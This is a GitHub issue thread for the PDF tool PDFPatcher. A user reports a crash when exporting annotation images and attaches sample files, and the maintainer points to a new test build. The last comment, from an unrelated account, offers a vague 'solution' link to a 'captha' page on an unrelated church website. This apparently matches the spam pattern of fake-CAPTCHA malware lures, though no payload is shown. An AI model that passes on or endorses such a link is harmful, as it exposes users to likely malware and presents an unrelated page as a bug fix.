### ISSUE TITLE
导出注释图片闪退

### ISSUE THREAD

**Issue by Charltsing** [wmjordan/PDFPatcher#244]
[gcslyyp1.zip](https://github.com/user-attachments/files/17533417/gcslyyp1.zip)

[annotses.zip](https://github.com/user-attachments/files/17533430/annotses.zip)

注释里面有个Im0，勾选导出注释图片，软件就over了

![1](https://github.com/user-attachments/assets/3ad219e6-91e4-4349-992d-c76a6c597db2)

**Comment by wmjordan** [comment]
请下载新的测试版

**Comment by Anshsahu0802** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
